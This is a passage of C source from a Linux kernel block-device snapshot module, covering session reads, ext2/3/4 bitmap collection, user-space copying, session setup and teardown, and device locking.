					s->s_cblocks, s->s_rcblocks, cachecnt);
/*	dump_data(page_address(s->s_mpages[0]), 0, "session_bread_fast"); */
	up(&s->s_sem);
	if (!ret && copy_to_user(bincache, &cachecnt, sizeof(cachecnt)))
		return -EACCES;
	return ret;
}

static inline int sn_page_mapcount(struct page *page)
{
#ifdef HAVE_PAGE_UMAPCOUNT
	return atomic_read(&page->_mapcount) + 1;
#elif defined(HAVE_PAGE_MAPCOUNT)
	return page_mapcount(page);
#else
	return (page->mapcount);
#endif
}

static int session_copy_to_cow(struct session_struct *s, char *data, unsigned int count)
{
	struct page **page_ref;
	int size;

	size = PAGE_SIZE;
	for (page_ref = s->s_mpages; count; data += PAGE_SIZE) {
		struct page *page;

		if (count < s->s_bppage) {
			size = count * s->s_bsize;
			count = 0;
		} else
			count -= s->s_bppage;

		page = *page_ref++;
		if (page && !sn_page_mapcount(page))
			if (copy_to_user(data, page_address(page), size))
				return -EACCES;
	}
	return 0;
}

static int session_bread(struct session_struct *s, unsigned long long bno,
			unsigned int count, char *data, unsigned int flags,
			unsigned long long *bincache)
{
	int ret;
	unsigned long long end;

	ret = -EINVAL;

	sa_debug(DEBUG_BREAD, "s=%p, bno=%llu, count=%u\n", s, bno, count);
	down(&s->s_sem);
	if (!s->s_blkmap.blkmap)
		goto out;
	end = bno + count;
	if (end < bno || end > s->s_blkmap.size)
		goto out;
	if (s->s_state != SNAP_MAPPED)
		goto out;

	if (s->s_vma && data == (char *)s->s_vma->vm_start &&
				count * s->s_bsize <= PAGE_SIZE * s->s_msize) {
		ret = session_bread_fast(s, bno, count, flags, bincache);
		/* coping data up to user COW'ed pages if any*/
		if (!ret && s->s_vma->anon_vma)
			ret = session_copy_to_cow(s, data, count);
		return ret;
	}
	ret = -EINVAL;
	sa_warn("Interface error.%s","\n");
out:
	up(&s->s_sem);
	return ret;
}

static int session_ldmap(struct session_struct *s, unsigned long long size,
								void *map)
{
	int ret;

	ret = -EINVAL;
	sa_debug(DEBUG_API, "size=%llu\n", size);
	down(&s->s_sem);
	if (s->s_state != SNAP_FROZEN)
		goto out_up;
	if (s->s_state != SNAP_FROZEN)
		goto out_up;
	sn_set_mb(s->s_state, SNAP_INITINGMAP);
#ifdef USE_VZ_VZSNAP
	if (s->s_veid) /* block_map already filled by block_map_init_vzsnap */
		ret = 0;
	else
#endif
	ret = block_map_init(s, size, map, 1);
	sa_heartbeat_stop(s);
	if (ret) {
		sn_set_mb(s->s_state, SNAP_MAP_ERR);
		goto out_unlock;
	}

	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_MAPPED);
	spin_unlock(&sessions_lock);

	ret = start_req_handler_thread(s);
	if (ret < 0)
		goto out_unlock;
	/* push delayed bios */
	cleanup_biolist(s);
	ret = 0;

out_unlock:
	sn_thaw_bdev(s);
out_up:
	up(&s->s_sem);
	return ret;
}

void static copy_page_bits_slow(void* dst, unsigned int dstbit, void* src,
				unsigned int srcbit, unsigned int len)
{
	while (len--) {
		if (test_bit(srcbit++, src))
			set_bit(dstbit++, dst);
		else
			clear_bit(dstbit++, dst);
	}
}

/* !NOTE!: we assume dst and src both are points to page start */

void static copy_page_bits(unsigned int* dst, unsigned int dstbit,
				unsigned int* src, unsigned int srcbit,
				unsigned int len)
{
	unsigned int* srcend;
	unsigned int headlen;

	/* normalize destination ptr and bitno by 4-byte boundary */
	dst += dstbit >> 5;
	dstbit &= 31;
	headlen = 32 - dstbit;
	if (len < headlen)
		headlen = len;
	copy_page_bits_slow(dst++, dstbit, src, srcbit, headlen);
	len -= headlen;
	if (!len)
		return;
	srcbit += headlen;
	/* normalize source ptr and bitno by 4-byte boundary*/
	src += srcbit >> 5;
	srcbit &= 31;
	/* processing the full DWORD's, DWORD-count is len/32 */
	srcend = src + (len >> 5);
	for (; src != srcend; src++)
		*dst++ = *(unsigned long long*)src >> srcbit;
	/* processing the tail, tail length is low 5 bits of len */
	copy_page_bits_slow(dst, 0, src, srcbit, len & 31);
}

static void copy_block_to_bitmap(struct session_struct* s, unsigned long long dest_bit,
						unsigned int len, void* array)
{
	unsigned int src_bit;

	src_bit = 0;
	while (len) {
		struct page* page;
		void* kaddr;
		unsigned int count;
		unsigned int bitno;	/* start bit on destination page */

		page = blkmap_page(s->s_blkmap.blkmap,
					dest_bit >> (PAGE_SHIFT + 3));
		bitno = dest_bit & (BITS_ON_PAGE - 1);
		count = BITS_ON_PAGE - bitno;
		if (count > len)
			count = len;
		kaddr = sn_kmap_atomic(page);
		copy_page_bits(kaddr, bitno, array, src_bit, count);
		sn_kunmap_atomic(kaddr);
		dest_bit += count;
		src_bit +=count;
		len -= count;
	}
}

static int compute_bitmap_ext2(struct session_struct *s)
{
	unsigned long long fblock;	/* first data block */
	unsigned int bpgroup;		/* blocks per group */
	unsigned int lgroup; 		/* last group */
	struct page* block_page;
	void* block;
	unsigned int count;

	count = 0;
	fblock = s->s_fblock;
	lgroup = s->s_gcount - 1;
	bpgroup =s->s_bpgroup;

	block_page = alloc_page(GFP_KERNEL);
	if (!block_page)
		return -1;
	block = page_address(block_page);
	while (1) {
		unsigned long long group;
		unsigned long long cblock;	/* current block */
		unsigned long long gstart_bit;
		int copy_count;

		cblock = any_block_in_cache(s);
		if (cblock == ~0ULL)
			break;
		group = cblock;
		gstart_bit = cblock - do_div(group, bpgroup) + fblock;
		if (sa_cache_read(s, block, cblock, 0, SNAP_READ_ONCE)
							!= s->s_bsize)
			break;
		count++;
		copy_count = bpgroup;
		if (group == lgroup)
			copy_count = s->s_blkmap.size - gstart_bit;
		copy_block_to_bitmap(s, gstart_bit, copy_count, block);
	}

	page_cache_release(block_page);
	return count;
}

static int copy_bitmap_to_user(struct session_struct *s, char* bitmap)
{
	void* taddr;
	struct page* tpage;
	int ret;
	unsigned int pageno;
	unsigned long long bytes;

	ret = -ENOMEM;
	bytes = (s->s_blkmap.size + 7) >> 3;
	tpage = alloc_page(GFP_KERNEL);
	if (!tpage)
		goto out;
	taddr = page_address(tpage);
	ret = 0;
	for (pageno = 0; bytes; bitmap += PAGE_SIZE, pageno++) {
		unsigned int copy_count;
		struct page* page;
		char *kaddr;

		page = blkmap_page(s->s_blkmap.blkmap, pageno);
		/* checking for last group */
		copy_count = bytes > PAGE_SIZE ? PAGE_SIZE : bytes;
		if (page) {
			kaddr = sn_kmap_atomic(page);
			memcpy(taddr, kaddr, copy_count);
			sn_kunmap_atomic(kaddr);
		} else
			memset(taddr, 0, PAGE_SIZE);
		ret = copy_to_user(bitmap, taddr, copy_count);
		if (ret) {
			ret = -EACCES;
			break;
		}
		bytes -= copy_count;
	}

out:
	if (tpage)
		page_cache_release(tpage);
	return ret;
}

static int check_session_params(struct session_struct *s)
{
	if (s->s_state != SNAP_FROZEN) {
		sa_warn("Session must be frozen (state=%d)\n", s->s_state);
		return -EINVAL;
	}

	if (!s->s_sb && !s->s_simulate_freeze) {
		sa_warn("No superblock info for s=%p\n", s);
		return -EINVAL;
	}

	if (s->s_sb && strncmp(s->s_sb->s_type->name, "ext", 3)) {
		sa_warn("Invalid partition type (%s)\n", s->s_sb->s_type->name);
		return -EINVAL;
	}
	return 0;
}

#ifdef USE_VZ_VZSNAP
static int vzsnap_getmap(struct session_struct* s)
{
	int ret;

	ret = -EINVAL;
	sn_set_mb(s->s_state, SNAP_MAP_ERR);
	if (s->s_vzs)
		return ret;
	s->s_vzs = vzsnap_get_map(s->s_veid, s->s_bdev);
	if (s->s_vzs == NULL) {
		vzsnap_release_map(s->s_vzs);
		return ret;
	}
	ret = block_map_init_vzsnap(s, s->s_vzs);
	vzsnap_release_map(s->s_vzs);
	s->s_vzs = NULL;
	if (ret)
		return ret;
	sn_set_mb(s->s_state, SNAP_FROZEN);
	return 0;
}
#endif //USE_VZ_VZSNAP

static int session_getmap(struct session_struct *s, unsigned long long size,
		void* bitmap, unsigned long bsize, unsigned long fblock,
		unsigned long bpgroup, unsigned long gcount)
{
	int ret;
	int pended;
	int bcount;
	unsigned long long bno;

	sa_debug(DEBUG_API, "s=%p size=%llu, bmap=%p, bsize=%lu, fblock=%lu,"
			" bpgroup=%lu, gcount=%lu\n", s, size, bitmap, bsize,
			fblock, bpgroup, gcount);
	bcount = 0;
	ret = -EINVAL;
	if (!bitmap || !size)
		return ret;

	down(&s->s_sem);
	ret = check_session_params(s);
	if (ret)
		goto out_up;

	s->s_fblock = fblock;
	s->s_gcount = gcount;
	s->s_bpgroup = bpgroup;
	s->s_bmsize = size;

	sn_set_mb(s->s_state, SNAP_INITINGMAP);
	sa_heartbeat_stop(s);
#ifdef USE_VZ_VZSNAP
	if (s->s_veid) {
		ret = vzsnap_getmap(s);
		if (ret)
			goto out_thaw;
		goto out_copy;
	}
#endif
	ret = block_map_init(s, size, bitmap, 0);
	if (ret) {
		sa_warn("block_map_init failed\n");
		goto out_thaw;
	}
	simulate_ioctl(s);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_READINGMAP);
	sn_set_mb(s->s_usemap, 0);
	spin_unlock(&sessions_lock);

	ret = start_req_handler_thread(s);
	if (ret < 0)
		goto out_thaw;

	flush_biolist(s);
	sn_thaw_bdev(s);

	/* Reading bitmap from device */
	bno = 0;
	while (1) {
		bno = find_next_block(&s->s_blkmap, bno);
		if (bno == ~0ULL)
			break;
		if (sa_cache_block(s, NULL, bno, 1, &pended)) {
			sa_warn("reading bitmap: sa_cache_block(%llu)\n", bno);
			goto out_destroy;
		}
		simulate_ioctl(s);
		bno++;
		bcount++;
	}
	stop_req_handler_thread(s, 1);
	sn_freeze_bdev(s);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_FROZEN);
	spin_unlock(&sessions_lock);

	ret = compute_bitmap_ext2(s);
	if (bcount != ret) {
		ret = -EPROTO;
		sa_warn("computing bitmap: %d!=%d\n", bcount, ret);
		goto out_thaw;
	}
/*	Setting bits at start of bitmap till FirstDataBlock	*/
/*	Moved to userspace 					*/
/*	for (bno = 0; bno < fblock; bno++)
		set_block_in_map(&s->s_blkmap, bno);
*/
#ifdef USE_VZ_VZSNAP
out_copy:
#endif
	simulate_ioctl(s);
	ret = copy_bitmap_to_user(s, bitmap);
	if (ret)
		goto out_thaw;

	simulate_ioctl(s);
	sa_heartbeat_start(s);
	up(&s->s_sem);
	return 0;

out_thaw:
	sn_thaw_bdev(s);

out_destroy:
	block_map_destroy(s);
	sn_set_mb(s->s_state, SNAP_MAP_ERR);

out_up:
	up(&s->s_sem);

	return ret;
}

static int copy_bits_to_user(unsigned long* map, unsigned long long bitno,
		unsigned long* src, unsigned int count)
{
	unsigned int rel;
	unsigned long uval;
	unsigned int offset = 0;
	int ret = 0;

	sa_debug(DEBUG_API, "map=%p bitno=%llu count=%u\n", map, bitno, count);
	if (bitno & 7) {
		/* Here target begin (and possibly end) is *not* aligned on byte border,
		   so we have to copy everything manually. */
		map += bitno / BITS_PER_LONG;

		/* First we copy all the bits until target hits 'long' border */
		ret = get_user(uval, map);
		if (ret)
			goto out;
		for (rel = bitno & (BITS_PER_LONG - 1);
				rel < BITS_PER_LONG && offset < count; ++rel, ++offset) {
			if (test_bit(offset, src))
				set_bit(rel, &uval);
			else
				clear_bit(rel, &uval);
		}
		ret = put_user(uval, map++);
		if (ret)
			goto out;

		/* Now our target is aligned on 'long' border, so we can copy data using full longs
		   up until last 'long' that possibly should not be copied fully.
		   Required bits of last 'long' will be copied later */
		while (count - offset >= BITS_PER_LONG) {
			uval = 0;
			for (rel = 0; rel < BITS_PER_LONG; ++rel, ++offset) {
				if (test_bit(offset, src))
					set_bit(rel, &uval);
			}
			ret = put_user(uval, map++);
			if (ret)
				goto out;
		}
	}
	else {
		/* Here we know that the target begin is aligned on byte border,
		   but the target end can still be not aligned on byte if count&7 != 0.
		   So we use copy_to_user to copy all whole bytes
		   and leave the bits in last non-whole byte to be copied on the next step. */
		/* uval is the number of bits to copy in last byte if it is not copied fully*/
		uval = (bitno + count) & 7;
		if (uval < count) {
			unsigned int bcnt = (count - uval) >> 3;
			ret = copy_to_user((unsigned char*)map + (bitno >> 3), src, bcnt);
			if (ret)
				goto out;
			offset = bcnt << 3;
		}
		map += (bitno + offset) / BITS_PER_LONG;
	}

	if (offset < count) {
		/* Here we copy last bits of bitmap when target's end in not aligned
		   on either unsigned long or byte depending on the branch that was taken previously.*/
		ret = get_user(uval, map);
		if (ret)
			goto out;
		for (rel = (bitno + offset) & (BITS_PER_LONG - 1); offset < count;
							++rel, ++offset) {
			if (test_bit(offset, src))
				set_bit(rel, &uval);
			else
				clear_bit(rel, &uval);
		}
		ret = put_user(uval, map);
		if (ret)
			goto out;
	}

out:
	return ret;
}

static int collect_bitmap_to_user(struct session_struct* s, void* map)
{
	int ret;
	struct page* block_page;
	void* block;

	sa_debug(DEBUG_API, "s=%p map=%p\n", s, map);
	ret = 0;
	block_page = alloc_page(GFP_KERNEL);
	if (!block_page)
		return -ENOMEM;
	block = page_address(block_page);

	map_init_iterator(&s->s_groupmap);
	ret = -EINVAL;
	do {
		unsigned long long bitno;
		unsigned long copy_count;
		struct group_entry* entry;

		entry = (void*)map_iterator_get_value(&s->s_groupmap);
		BUG_ON(!entry);

		bitno = (unsigned long long)entry->group * s->s_bpgroup + s->s_fblock;

		copy_count = s->s_bpgroup;
		if (entry->group == s->s_gcount - 1)
			copy_count = s->s_bmsize - bitno;

		if (!entry->cached)
			memset(block, 0, (copy_count + 7) >> 3);
		else if (sa_cache_read(s, block, entry->bno, 0,
						SNAP_READ_ONCE)	!= s->s_bsize) {
			sa_warn("cache block %llu can't be read\n", entry->bno);
			map_iterator_stop(&s->s_groupmap);
			break;
		}

		ret = copy_bits_to_user(map, bitno, block, copy_count);
		if (ret) {
			sa_warn("copy_bits_to_user failed (%d)\n", ret);
			break;
		}
	} while (map_iterator_next(&s->s_groupmap));

	page_cache_release(block_page);
	return ret;
}

static int session_getsparsedmap(struct session_struct *s,
		unsigned long long size, void *bitmap, unsigned long bsize,
		unsigned long fblock, unsigned long bpgroup,
		unsigned long gcount, unsigned long groups)
{
	int ret;
	int pended;
	struct group_entry* entry;

	sa_debug(DEBUG_API, "s=%p size=%llu bsize=%lu fblock=%lu bpgroup=%lu "
			"gcount=%lu groups=%lu\n", s, size, bsize, fblock,
			bpgroup, gcount, groups);

	ret = -EINVAL;
	if (!bitmap || !size || !gcount || !s->s_sb)
		return ret;

	down(&s->s_sem);
	if (s->s_state != SNAP_FROZEN) {
		sa_warn("Session must be frozen (state=%d)\n", s->s_state);
		goto out_up;
	}

	if (strcmp(s->s_sb->s_type->name, "ext2") &&
	    strcmp(s->s_sb->s_type->name, "ext3") &&
	    strcmp(s->s_sb->s_type->name, "ext4")) {
		sa_warn("Invalid partition type (%s)\n", s->s_sb->s_type->name);
		goto out_up;
	}
	sn_set_mb(s->s_state, SNAP_INITINGMAP);

	s->s_fblock = fblock;
	s->s_gcount = gcount;
	s->s_bpgroup = bpgroup;
	s->s_bmsize = size;

	ret = map_init(s, groups, gcount);
	if (ret)
		goto out_thaw;

	simulate_ioctl(s);

	map_init_iterator(&s->s_groupmap);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_READINGMAP);
	sn_set_mb(s->s_usemap, 1);
	spin_unlock(&sessions_lock);

	sa_heartbeat_stop(s);
	ret = start_req_handler_thread(s);
	if (ret < 0)
		goto out_thaw;

	flush_biolist(s);
	sn_thaw_bdev(s);

	do {
		simulate_ioctl(s);
		entry = (struct group_entry*)map_iterator_get_value(&s->s_groupmap);
		BUG_ON(!entry);
		if (entry->init && !entry->cached && sa_cache_block(s, NULL,
						entry->bno, 1, &pended)) {
			sa_warn("caching block of %llu failed\n" , entry->bno);
			map_iterator_stop(&s->s_groupmap);
			goto out_destroy;
		}

	} while (map_iterator_next(&s->s_groupmap));

	stop_req_handler_thread(s, 1);
	sn_freeze_bdev(s);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_FROZEN);
	spin_unlock(&sessions_lock);

	ret = collect_bitmap_to_user(s, bitmap);
	if (ret)
		goto out_thaw;

	map_free(s);
	sa_heartbeat_start(s);
	simulate_ioctl(s);
	up(&s->s_sem);
	return 0;

out_thaw:
	sn_set_mb(s->s_state, SNAP_MAP_ERR);
	sn_thaw_bdev(s);

out_destroy:
	map_free(s);
	sn_set_mb(s->s_state, SNAP_MAP_ERR);

out_up:
	up(&s->s_sem);
	return ret;
}

static int do_init_session(struct session_struct *s, dev_t kdev, int prealloc)
{
	int ret;
	int sa_page_size;
	int max_req;
	sn_request_queue *q;

	ret = -ENODEV;
	/* sharing mode - can use 0 as holder */
	s->s_bdev = sn_blkdev_get_by_dev(kdev, BLKDEV_GET_MODE_SHARED, NULL, &s->s_bdev_container);
	if (!s->s_bdev)
		goto out;
	ret = -ENODEV;
#ifdef HAVE_BDEV_WHOLE
	if (!bdev_whole(s->s_bdev))
#else
	if (!s->s_bdev->bd_contains)
#endif
		goto out_blk_put;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
	s->s_sb = sn_get_super(s->s_bdev);
#else
	s->s_sb = user_get_super(kdev);
#endif
	sa_debug(DEBUG_INTERNALS, "s->s_sb=%p\n", s->s_sb);
	if (!s->s_sb)
	{
		s->s_bsize = PAGE_SIZE;
		s->s_bppage = PAGE_SIZE / s->s_bsize;
		s->s_simulate_freeze = 1;
	} else {
		s->s_bsize = (s->s_sb->s_blocksize > PAGE_SIZE) ? PAGE_SIZE : s->s_sb->s_blocksize;
		s->s_bppage = PAGE_SIZE / s->s_bsize;
		if (strcmp(s->s_sb->s_type->name, "vfat") == 0)
			s->s_simulate_freeze = 1;
		sn_drop_super(s->s_sb);
		s->s_sb = NULL;
	}
	s->s_spb = s->s_bsize >> 9;
	if (!s->s_spb) {
		sa_warn("Device %x has incorrect block size %d\n", kdev,
								s->s_bsize);
		goto out_blk_put;
	}
	s->s_spbshift = ffz(~s->s_spb);
	s->s_pstart = get_start_sect(s->s_bdev);
#ifdef HAVE_BDEV_IS_PARTITION
	if (bdev_is_partition(s->s_bdev))
#else
	if (s->s_bdev->bd_part)
#endif
#ifdef HAVE_BDEV_NR_SECTORS
		s->s_plen = bdev_nr_sectors(s->s_bdev);
#else
		s->s_plen = s->s_bdev->bd_part->nr_sects;
#endif
	else if (s->s_bdev->bd_disk)
		s->s_plen = get_capacity(s->s_bdev->bd_disk);
	else
		sa_warn("Can't detect device %x size.\n", kdev);

	q = bdev_get_queue(s->s_bdev);
	if (!q) {
		sa_warn("Device %x does not have a queue.\n", kdev);
		goto out_blk_put;
	}
#ifdef HAVE_QUEUE_MAX_SECTORS
	max_req = (queue_max_sectors(q) << 9) / PAGE_SIZE;
#else
	max_req = (q->max_sectors << 9) / PAGE_SIZE;
#endif

	sa_debug(DEBUG_API, "s_bsize=%d s_bppage=%d s_spb=%d s_spbshift=%d"
		" s_plen=%llu s_pstart=%llu\n",
		s->s_bsize, s->s_bppage, s->s_spb, s->s_spbshift, s->s_plen,
		s->s_pstart);

	ret = -ENOMEM;

	s->s_bioarr = (struct bio***)get_zeroed_page(GFP_KERNEL);
	if (!s->s_bioarr)
		goto out_blk_put;
	inc_get_pages(s);

	sprintf(s->s_blkcachename, "snapapi_blk_%lu", (unsigned long)atomic_inc_return(&slab_uid));
	sa_page_size = sizeof(struct sa_page) +
				sizeof(unsigned long long) * (s->s_bppage - 1);
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,23)
	s->s_blkcachep = kmem_cache_create(s->s_blkcachename, sa_page_size,
								0, 0, 0, NULL);
#else
	s->s_blkcachep = kmem_cache_create(s->s_blkcachename, sa_page_size,
					0, 0, (void*)sn_get_blkcache_ctor(s->s_bppage));
#endif
	if (!s->s_blkcachep)
		goto out_free;

	ret = sa_blkchains_init(s);
	if (ret)
		goto out_destroy_blkchains;

	ret = sa_cache_emlist_init(s, prealloc);
	if (ret)
		goto out_destroy;

	s->s_maxmsize = MAX_MMPAGES;
	s->s_ahead_bno = ~0ULL;
	/* pending queue init */
	s->s_pending_queue.pq_req = NULL;
	s->s_pending_queue.pq_reqtail = NULL;
	s->s_pending_queue.pq_state = 0;
	init_completion(&s->s_pending_queue.pq_done);
	init_completion(&s->s_pending_queue.pq_bio_done);
	atomic_set(&s->s_pending_queue.pq_ready_req, 0);
	atomic_set(&s->s_pending_queue.pq_notready_req, 0);
	s->s_pending_queue.pq_state = PQ_STOPPED;

	sn_set_mb(s->s_state, SNAP_INITED);
	return 0;

out_destroy:
	sa_cache_emlist_destroy(s);
out_destroy_blkchains:
	sa_blkchains_destroy(s);
out_free:
	free_page((unsigned long)s->s_bioarr);
	inc_put_pages(s);
	s->s_bioarr = NULL;
out_blk_put:
	sn_blkdev_put_by_dev(s->s_bdev, FMODE_READ, NULL, s->s_bdev_container);
out:
	sn_set_mb(s->s_state, SNAP_NOTINITED);
	s->s_bdev = NULL;
	return ret;
}

static void mpages_destroy(struct session_struct *s)
{
	int i;
	sa_debug(DEBUG_API, "s=%p\n", s);

	for (i = 0; i < s->s_msize; i++) {
		struct page * page;
		page = s->s_mpages[i];
		if (page) {
			sa_debug(DEBUG_INTERNALS, "s=%p, i=%d, page=%p(%d)\n",
						s, i, page, page_count(page));
			page_cache_release(page);
			inc_put_pages(s);
			s->s_mpages[i] = NULL;
		}
	}
	if (s->s_local_bios) {
		sa_debug(DEBUG_INTERNALS, "s=%p, free local_bios(%p)\n",
					s, s->s_local_bios);
		kfree(s->s_local_bios);
	}

	s->s_local_bios = NULL;
	s->s_msize = 0;
}

#define	DL_READ 0
#define	DL_WRITE 1

static const char* devlock_name(unsigned lock_type)
{
	return lock_type == DL_WRITE ? "write" : "read";
}

static struct locked_dev* find_lockeddev(struct session_struct* s,
					dev_t dev)
{
	struct locked_dev* idev, *end;

	end = devlocked + MAX_LOCKEDDEVS;
	for (idev = devlocked; idev != end; idev++)
		if (idev->dev == dev && idev->sess == s)
			return idev;
	return 0;
}

static struct locked_dev* create_lockeddev(struct session_struct* s,
			struct block_device *bdev, dev_t dev, unsigned lock_type, void **container)
{
	struct locked_dev* idev, *end;
	end = devlocked + MAX_LOCKEDDEVS;
	for (idev = devlocked; idev != end; idev++)
		if (!idev->dev) {
			idev->dev = dev;
			idev->bdev = bdev;
			idev->sess = s;
			idev->lock_type = lock_type;
			idev->bdev_container = container;
			lockedcnt++;
			return idev;
		}
	return 0;
}

static void remove_lockeddev(struct locked_dev* ldev)
{
	memset(ldev, 0, sizeof(struct locked_dev));
	lockedcnt--;
}

static int _sn_lockdev_check_sb(struct block_device *bdev)
{
	struct super_block *sb;
	sb = sn_get_super(bdev);
	if (sb) {
		sn_drop_super(sb);
		return -EBUSY;
	}
	return 0;
}

#ifdef HAVE_BD_CLAIM
#define sn_bd_claim(a, b) bd_claim(a, b)
#define sn_bd_release(a) bd_release(a)
#else
#define sn_bd_claim(a, b) 0
#define sn_bd_release(a)
#endif

static int _sn_lockdev(dev_t dev, void* holder, struct block_device **rbdev, void **container)
{
	int ret;
	ret = -ENODEV;
	/* excl mode - use outself as holder */
	*rbdev = sn_blkdev_get_by_dev(dev, BLKDEV_GET_MODE_EXCL, _sn_lockdev, container);
	if (!*rbdev)
		return ret;

	ret = _sn_lockdev_check_sb(*rbdev);
	if (ret) {
		sn_blkdev_put_by_dev(*rbdev, BLKDEV_GET_MODE_EXCL, NULL, container);
		return ret;
	}

	ret = sn_bd_claim(*rbdev, holder);
	if (ret) {
		sn_blkdev_put_by_dev(*rbdev, BLKDEV_GET_MODE_EXCL, NULL, container);
		return ret;
	}
	return 0;
}

static void _sn_unlockdev(struct block_device *bdev, void *container)
{
	sn_bd_release(bdev);
	sn_blkdev_put_by_dev(bdev, BLKDEV_GET_MODE_EXCL, NULL, container);
}

static int session_lockdev(struct session_struct *s, dev_t dev,
						unsigned lock_type)
{
	int ret;
	struct locked_dev* ldev;
	struct block_device *bdev;
	void *holder;
	void *bdev_container;

	sa_debug(DEBUG_API, "s=%p, dev=%x, type=%s\n", s,
			dev, devlock_name(lock_type));
	ret = -ENOMEM;

	down(&devlocked_sem);
	if (lockedcnt >= MAX_LOCKEDDEVS || !devlocked)
		goto out_up;
	ret = -ENODEV;
	ldev = find_lockeddev(s, dev);
	if (ldev) {
		ret = -EEXIST;
		sa_warn("Device %X already have %s-lock for session %p.\n",
			dev, devlock_name(ldev->lock_type), s);
		goto out_up;
	}

	holder = lock_type == DL_WRITE ? s : (void *)session_lockdev;
	bdev_container = 0;
	ret = _sn_lockdev(dev, holder, &bdev, &bdev_container);
	if (ret)
		goto out_up;

	ldev = create_lockeddev(s, bdev, dev, lock_type, bdev_container);
	if (!ldev) {
		sa_warn("All devlocked slots are exhausted\n");
		ret = -ENOMEM;
		goto out_release;
	}
	up(&devlocked_sem);
	return 0;

out_release:
	_sn_unlockdev(bdev, bdev_container);
out_up:
	up(&devlocked_sem);
	return ret;
}

static int session_unlockdev(struct session_struct *s, dev_t dev,
						unsigned lock_type)
{
	int ret;
	struct locked_dev* ldev;

	sa_debug(DEBUG_API, "s=%p, dev=%x, type=%s\n", s,
			dev, devlock_name(lock_type));
	ret = -ENOMEM;
	down(&devlocked_sem);
	if (!devlocked)
		goto out_up;
	ret = -ESRCH;
	ldev = find_lockeddev(s, dev);
	if (!ldev) {
		sa_warn("No lock for device (%X) in session (%p)\n", dev, s);
		goto out_up;
	}
	ret = -EINVAL;
	if (ldev->lock_type != lock_type) {
		sa_warn("Lock for device (%X) in session (%p) is of type %s\n",
			dev, s, devlock_name(lock_type));
		goto out_up;
	}

	_sn_unlockdev(ldev->bdev, ldev->bdev_container);

	remove_lockeddev(ldev);
	ret = 0;

out_up:
	up(&devlocked_sem);
	return ret;
}

static void unlock_sessiondevs(struct session_struct *s)
{
	struct locked_dev* idev, *end;

	sa_debug(DEBUG_API, "\n");

	down(&devlocked_sem);
	if (!devlocked)
		goto out_up;
	end = devlocked + MAX_LOCKEDDEVS;

	for (idev = devlocked; idev != end; idev++) {
		if (!idev->bdev || idev->sess != s)
			continue;
		_sn_unlockdev(idev->bdev, idev->bdev_container);
		remove_lockeddev(idev);
	}
out_up:
	up(&devlocked_sem);
}

static int session_set_pidinfo(struct session_struct *s)
{
	int i;
	struct sn_pid_info* free_p = NULL;
	struct sn_pid_info* curr_p = pid_info_p;
	pid_t pid = current->pid;

	for (i = 0; i < MAX_PID_INFO; i++, curr_p++) {
		if (!curr_p->sn_pid && !free_p)
			free_p = curr_p;
		if (curr_p->sn_pid == pid) {
			atomic_inc(&curr_p->sn_refs);
			s->s_pid_info = curr_p;
			return 0;
		}
	}
	if (free_p) {
		free_p->sn_pid = pid;
		s->s_pid_info = free_p;
		atomic_inc(&free_p->sn_refs);
		return 0;
	}
	return 1;
}

static void session_reset_pidinfo(struct session_struct *s)
{
	if (!s->s_pid_info)
		return;

	if (atomic_dec_and_test(&s->s_pid_info->sn_refs)) {
		s->s_pid_info->sn_pid = 0;
		atomic_set(&s->s_pid_info->sn_ioctls, 0);
	}
	s->s_pid_info = NULL;
}

static void close_session(struct session_struct *s, int do_free)
{
	sa_debug(DEBUG_API, "s=%p\n", s);
	down(&s->s_sem);
	sa_heartbeat_stop(s);
	unregister_make_request(s);
	stop_req_handler_thread(s, 0);
	sa_debug(DEBUG_API, "s=%p, users=%d, do_free=%d\n", s,
					atomic_read(&s->s_users), do_free);
	wait_for_users(s);
	spin_unlock(&sessions_lock);
	if (s->s_state == SNAP_FROZEN) {
		sn_thaw_bdev(s);
	}
	mpages_destroy(s);
	sa_cache_emlist_destroy(s);
	cleanup_biolist(s);
	cleanup_snapshot(s);
	if (s->s_bdev) {
		sn_blkdev_put_by_dev(s->s_bdev, FMODE_READ, NULL, s->s_bdev_container);
		s->s_bdev = NULL;
	}
	block_map_destroy(s);
	sa_blkchains_destroy(s);
	unlock_sessiondevs(s);

	if (s->s_kdev != 0 && s->s_rblocks) {
		struct sn_state out;
		fill_state(s, &out);
		session_stat(&out);
	}
	spin_lock(&sessions_lock);
	list_del_init(&s->s_list);
	if (!do_free)
		list_add(&s->s_list, &notinited_list);
	session_reset_pidinfo(s);
	sn_set_mb(s->s_state, SNAP_NOTINITED);
	s->s_kdev = 0;
	spin_unlock(&sessions_lock);
	up(&s->s_sem);
	if (do_free)
		kfree(s);
}
#if 0
static int chk_conflicts(dev_t kdev)
{
	struct list_head *tmp;

	list_for_each(tmp, &sessions_list) {
		struct session_struct *s;

		s = list_entry(tmp, struct session_struct, s_list);
		/* one queue per device */
		if (MAJOR(s->s_kdev) == MAJOR(kdev))
			return 1;
	}
	return 0;
}
#endif
static int session_init(struct session_struct * s, dev_t kdev, int prealloc)
{
	int ret;

	sa_debug(DEBUG_API, "s=%p, dev=%x, prealloc=%d\n", s, kdev, prealloc);
	ret = -EBUSY;
	down(&s->s_sem);
	if (s->s_state != SNAP_NOTINITED)
		goto out;

	spin_lock(&sessions_lock);
/*
	if (chk_conflicts(kdev)) {
		spin_unlock(&sessions_lock);
		goto out;
	}
*/
	if (session_set_pidinfo(s) != 0) {
		spin_unlock(&sessions_lock);
		sa_warn("No free pid_info, max %ld, device %x\n",
						MAX_PID_INFO, kdev);
		goto out;
	}

	list_del_init(&s->s_list);
	s->s_kdev = kdev;
	sn_set_mb(s->s_state, SNAP_ININIT);
	list_add_tail(&s->s_list, &sessions_list);
	spin_unlock(&sessions_lock);
	ret = do_init_session(s, kdev, prealloc);
	if (ret) {
		spin_lock(&sessions_lock);
		list_del_init(&s->s_list);
		s->s_kdev = 0;
		session_reset_pidinfo(s);
		sn_set_mb(s->s_state, SNAP_NOTINITED);
		list_add(&s->s_list, &notinited_list);
		spin_unlock(&sessions_lock);
		goto out;
	}
